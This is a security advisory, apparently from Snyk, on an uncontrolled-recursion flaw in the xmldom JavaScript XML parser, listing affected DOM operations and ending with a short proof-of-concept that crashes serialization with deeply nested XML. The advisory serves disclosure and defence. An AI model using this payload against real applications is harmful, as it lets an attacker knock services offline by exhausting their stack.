Uncontrolled Recursion Affecting xmldom package, versions *
Threat Intelligence
Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk IDSNYK-JS-XMLDOM-16134529
- published23 Apr 2026
- disclosed22 Apr 2026
- creditJvr2022, praveen-kv, KarimTantawey
Introduced: 22 Apr 2026
NewCVE-2026-41673 (opens in a new tab)How to fix?
A fix was pushed into the master branch but not yet published.
Overview
xmldom is an A pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module.
Affected versions of this package are vulnerable to Uncontrolled Recursion in the recursive processing of deeply nested XML documents by several DOM-related operations, including normalize, serializeToString, getElementsByTagName, getElementsByTagNameNS, getElementsByClassName, getElementById, cloneNode, importNode, textContent, and isEqualNode. An attacker can cause the application to crash or become unresponsive by submitting a valid, deeply nested XML payload that triggers uncontrolled recursion and stack exhaustion.
PoC
const { DOMParser, XMLSerializer } = require('@xmldom/xmldom');
const depth = 5000;
const xml = '<a>'.repeat(depth) + '</a>'.repeat(depth);
const doc = new DOMParser().parseFromString(xml, 'text/xml');
new XMLSerializer().serializeToString(doc);
// RangeError: Maximum call stack size exceeded